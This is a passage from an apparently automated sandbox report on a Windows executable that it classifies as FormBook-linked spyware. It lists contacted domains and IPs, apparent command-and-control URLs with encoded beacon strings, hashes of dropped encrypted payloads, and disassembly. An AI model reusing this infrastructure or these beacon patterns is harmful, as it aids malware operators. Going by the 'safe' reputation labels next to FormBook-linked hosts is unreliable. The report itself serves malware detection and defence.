https://duckduckgo.com/chrome_newtab	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.value-domain.com/	netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png	netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://code.jquery.com/jquery-3.7.1.min.js	netbtugc.exe, 00000004.00000002.4642290282.0000000003986000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_	netbtugc.exe, 00000004.00000002.4644164131.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4642290282.0000000003FCE000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.000000000326E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.sedo.com/services/parking.php3	eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.000000000326E000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list	netbtugc.exe, 00000004.00000002.4642290282.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003592000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css	netbtugc.exe, 00000004.00000002.4642290282.00000000042F2000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003592000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.empowermedeco.com/fo8o/?wP=mxnR	netbtugc.exe, 00000004.00000002.4642290282.000000000493A000.00000004.10000000.00040000.00000000.sdmp, eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000003BDA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rakkoma.com/	eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.value-domain.com/modall.php	eODCXMCnMwxOuMbj.exe, 00000008.00000002.4641676786.0000000002C26000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.joyesi.xyz	eODCXMCnMwxOuMbj.exe, 00000008.00000002.4643559111.0000000004B2E000.00000040.80000000.00040000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	netbtugc.exe, 00000004.00000003.2503685798.000000000784E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.rssnewscast.com	Germany	47846	SEDO-ASDE	false
154.215.72.110	www.3xfootball.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
195.110.124.133	elettrosistemista.zip	Italy	39729	REGISTER-ASIT	false
15.197.240.20	www.donnavariedades.com	United States	7430	TANDEMUS	false
52.25.92.0	www.kasegitai.tokyo	United States	16509	AMAZON-02US	false
116.50.37.244	www.goldenjade-travel.com	Taiwan; Republic of China (ROC)	18046	DONGFONG-TWDongFongTechnologyCoLtdTW	false
199.59.243.226	77980.bodis.com	United States	395082	BODIS-NJUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
66.29.149.46	www.techchains.info	United States	19538	ADVANTAGECOMUS	false
15.197.172.60	www.liangyuen528.com	United States	7430	TANDEMUS	false
217.196.55.202	empowermedeco.com	Norway	29300	AS-DIRECTCONNECTNO	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1491513
Start date and time:	2024-08-12 12:59:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rPHOTO09AUG2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@14/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 51 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target eODCXMCnMwxOuMbj.exe, PID 6920 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:01:01	API Interceptor	10969514x Sleep call for process: netbtugc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	bum2sl4tSW66Q5O.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.seancollinsmusic.com/ps15/?t8o4=IiUdWomF5k9qaWufAEOF1gY9kHVftwkJ6cV9tSoeDtYAHjCeVDLi568qZcu0mi0k9Trm&jPj8q=pFQLwhtH0
	5.exe	Get hash	malicious	FormBook	Browse	www.nadiiadrinkscoffee.com/ge34/?Hp=X6AHZfrXbRHH7xE&pP=DtaDJi3z2nipX4nJS/IcJCcbDk/4k1gE0+TxNtH8tFZPjGhx/2qD/OBkCIHBCYb1eipf
	factura.exe	Get hash	malicious	FormBook	Browse	www.ssgame56c.org/qpcj/?IVD=vTEpW4TmB&PCKydxRp=hXmtMExE2v9HEeiW+ulHLkzTySI3TL5baDMJUDroKowqF3JNdygLwqeM0chXN5g2/8j8rpp6Ovu5nc6C/eq8J6bvYVTB8B/ZOQ8YY77+xTTm
	Document TOP19928.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/?xVY=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&Nz=LPhpDRap3
	opp46lGmxd.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	mzrHGroQZy.hta	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	j5Gx6UXYOm.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	5fG4r07BPy.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77980.bodis.com	PO AFHOR9301604.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Quote - V-24-TOS-082.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	lUITPOq6Et.exe	Get hash	malicious	Unknown	Browse	199.59.243.226
	LisectAVT_2403002C_186.exe	Get hash	malicious	Upatre	Browse	199.59.243.226
	http://proxv593uu9848j.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://lovelycarrot.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://lovelycarrot.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	factura.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	http://cns.archiq.net	Get hash	malicious	Unknown	Browse	199.59.243.226
	TL6bE5Uq4y.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	199.59.243.226
www.donnavariedades.com	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	15.197.240.20

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	rbeastmode.exe	Get hash	malicious	FormBook	Browse	160.124.205.227
	z1PEDIDODECOMPRAURGENTE.exe	Get hash	malicious	FormBook	Browse	154.213.157.32
	z2AMOSTRAS.exe	Get hash	malicious	FormBook	Browse	154.213.157.32
	154.216.17.9-skid.sh4-2024-08-04T06_23_11.elf	Get hash	malicious	Mirai, Moobot	Browse	156.251.7.188
	77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elf	Get hash	malicious	Mirai, Moobot	Browse	156.244.234.141
	payment copy pdf.exe	Get hash	malicious	FormBook	Browse	160.124.205.227
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	154.213.157.32
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	154.213.157.32
	#U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exe	Get hash	malicious	FormBook	Browse	154.213.157.32
	54guV3J1pQ.elf	Get hash	malicious	Mirai	Browse	154.216.35.204
TANDEMUS	https://layanan-verifikasiaccountid.weebly.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://bqrsy.seekinvest.co/4xnSRn15308idbK1376jqowxkjgss14745HXOATNJZKAZVKSP98PXJV17762C16#8gfe0i2lkfqxzo4xifhbmdsxykiibapo1vlzxy35431iw10ly9	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://theweber.group	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	https://go.microsoft.com/fwlink/?LinkID=2092201&clcid=0x407	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://us-ledgerlive.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://bt-102480.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://att-login380.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	http://www.win365e.com/	Get hash	malicious	Unknown	Browse	15.197.192.55
	http://bt-home-100671.square.site/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://d.3656240128.xyz/	Get hash	malicious	Unknown	Browse	15.197.192.55
REGISTER-ASIT	00451.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Payment advice.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Quotation-581024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Quote - V-24-TOS-082.exe	Get hash	malicious	FormBook	Browse	81.88.57.96
	QUOTATION.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Enquiry24-789.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	81.88.58.196
	TRANSFERENCIA BANCARIA SWIFTsxlx..exe	Get hash	malicious	Coinhive, FormBook, Xmrig	Browse	81.88.48.71
SEDO-ASDE	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Payment Advice_pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.12
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	NEcFLmCS7qNMwHy.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	NNj87.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	NJjU88.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	BHYIOPIj.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	z1PEDIDODECOMPRAURGENTE.exe	Get hash	malicious	FormBook	Browse	91.195.240.19

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sancha

Download File

Process:	C:\Users\user\Desktop\rPHOTO09AUG2024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.992703629181057
Encrypted:	true
SSDEEP:	6144:jibcp8khJUVzYg+w+XoNoEbEyoLPgHiSrRvkzSI02UqsX:+Kw1YJw+XoFbcEC6xI077
MD5:	2797EE7476686939E4AB84A6DF48B6E5
SHA1:	35519289502497F770FB1E3DC33DAA6D13A25650
SHA-256:	09B4FC8ADBCF71E7432334F0774DB7191BD8A870E1D22972E8BBB087F5EC38AC
SHA-512:	250D678B4CF754718C64404F66995665F4A95DEE6B921B96A38456F15D833B326021AB68384826FC62EE5578D82E8DBCC9CE82ABCECCD6A726EB10F923C976E4
Malicious:	false
Reputation:	low
Preview:	uo\|..EBELl.D...f.EA...pHE..9Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z.EBEB+.EM.1...0..d.\18mJZ^(P(b&-Z6$9zZP.(D+b,"....zUZ]?.HOOh4XKMZ85@[8..%+.e+..U^.+..vT?.W....:V.X...d+*.j\Z2.%%.L4XKMZ85i.1E.DM4.#..859Z1EBE.4ZJF[359J5EBEL4XKMZ. 9Z1UBEL.\KMZx59J1EBGL4^KMZ859Z7EBEL4XKMz<59X1EBEL4ZK..85)Z1UBEL4HKMJ859Z1EREL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKc.]MMZ1E.JH4X[MZ8%=Z1UBEL4XKMZ859Z1EbELTXKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1E

C:\Users\user\AppData\Local\Temp\autA80A.tmp

Download File

Process:	C:\Users\user\Desktop\rPHOTO09AUG2024.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.992703629181057
Encrypted:	true
SSDEEP:	6144:jibcp8khJUVzYg+w+XoNoEbEyoLPgHiSrRvkzSI02UqsX:+Kw1YJw+XoFbcEC6xI077
MD5:	2797EE7476686939E4AB84A6DF48B6E5
SHA1:	35519289502497F770FB1E3DC33DAA6D13A25650
SHA-256:	09B4FC8ADBCF71E7432334F0774DB7191BD8A870E1D22972E8BBB087F5EC38AC
SHA-512:	250D678B4CF754718C64404F66995665F4A95DEE6B921B96A38456F15D833B326021AB68384826FC62EE5578D82E8DBCC9CE82ABCECCD6A726EB10F923C976E4
Malicious:	false
Reputation:	low
Preview:	uo\|..EBELl.D...f.EA...pHE..9Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z.EBEB+.EM.1...0..d.\18mJZ^(P(b&-Z6$9zZP.(D+b,"....zUZ]?.HOOh4XKMZ85@[8..%+.e+..U^.+..vT?.W....:V.X...d+*.j\Z2.%%.L4XKMZ85i.1E.DM4.#..859Z1EBE.4ZJF[359J5EBEL4XKMZ. 9Z1UBEL.\KMZx59J1EBGL4^KMZ859Z7EBEL4XKMz<59X1EBEL4ZK..85)Z1UBEL4HKMJ859Z1EREL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKc.]MMZ1E.JH4X[MZ8%=Z1UBEL4XKMZ859Z1EbELTXKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1EBEL4XKMZ859Z1E

C:\Users\user\AppData\Local\Temp\autA849.tmp

Download File

Process:	C:\Users\user\Desktop\rPHOTO09AUG2024.exe
File Type:	data
Category:	dropped
Size (bytes):	9720
Entropy (8bit):	7.622936357074632
Encrypted:	false
SSDEEP:	192:CZIUd0613En0FYH7bVs10jdGa2lHpZo543UOPGYmmwNz2V7rZ:Yd061Un0OH7qWjda6OuYHwJ2VJ
MD5:	DE51E26CD72FAACE06CB94EF69DDE155
SHA1:	7F29C354E9640688CE944D85991A1BB49F5B72CB
SHA-256:	68C67E020A4ABF8CDE3B25B6EE0C0D0BF1BF2B7B986170E26EAE07C5E1AA9F16
SHA-512:	FD0101D3F9A71052861EF605A05F29383B0835C48DAF93D5C2DF6106135A32AB417CC5CE4BC534466B7727C99CF2E19E999E38D46B56BD689593902120028244
Malicious:	false
Reputation:	low
Preview:	EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........\|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3\|vY..G.6.Yf.8_..oe..i\|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...

C:\Users\user\AppData\Local\Temp\savager

Download File

Process:	C:\Users\user\Desktop\rPHOTO09AUG2024.exe
File Type:	FGDC-STD-001-1998
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5753308133183093
Encrypted:	false
SSDEEP:	384:gAQKkebSwQ4/6BvsM6IYj8R/15yduj/fcLh2gqO2xsV8fGbLph1juTJOtHtiP:PQKzqPsMMIRNj892gSxs8GbLph1jXtAP
MD5:	1EEC821645E99844B1A5BA575BA6B84D
SHA1:	7EA1EFD402DBD74F1AFC63AA3C7BD86EFA1EF46C
SHA-256:	625C07C748CAA90FA8174CB29FB111819BC81202A2F47459E2F1BD6C58C6245E
SHA-512:	54A217C73D669F6B3FE87ED8CA8B4CBAE9B11080381DD6C9B29F83E6BE155F681ABE5892C04D9E9BB2F2B5AAF2725271C117BF8B430FD691565B917BA5625F31
Malicious:	false
Reputation:	low
Preview:	2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.228519007947297
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rPHOTO09AUG2024.exe
File size:	1'273'856 bytes
MD5:	6440ceccbbdec781207b92203d4161f3
SHA1:	be51fbd7425db9a941dce835c4d05e85a4f65db2
SHA256:	9e09b85fb807bec991432ccce6a4cf6ed8aa1044803dbbd80ea1a442e6e93882
SHA512:	688eb3b3055f95f00ae427a825858daa28fd25f44a747877189cffe75bac8307b438b11074e7a3e145ed254347163a5404c3099c31d62aa95896f7dd0af7b72f
SSDEEP:	24576:2AHnh+eWsN3skA4RV1Hom2KXMmHaCkdKVBhCXXrUmWRERP5:Rh+ZkldoPK8YaCiwhCHhv
TLSH:	F445BE0273D1C036FFABA2739B6AF60556BD79254133852F13981DB9BC701B2263E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B5BF95 [Fri Aug 9 07:04:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F8D451A4F5Dh
jmp 00007F8D45197D14h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F8D45197E9Ah
cmp edi, eax
jc 00007F8D451981FEh
bt dword ptr [004C41FCh], 01h
jnc 00007F8D45197E99h
rep movsb
jmp 00007F8D451981ACh
cmp ecx, 00000080h
jc 00007F8D45198064h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F8D45197EA0h
bt dword ptr [004BF324h], 01h
jc 00007F8D45198370h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F8D4519803Dh
test edi, 00000003h
jne 00007F8D4519804Eh
test esi, 00000003h
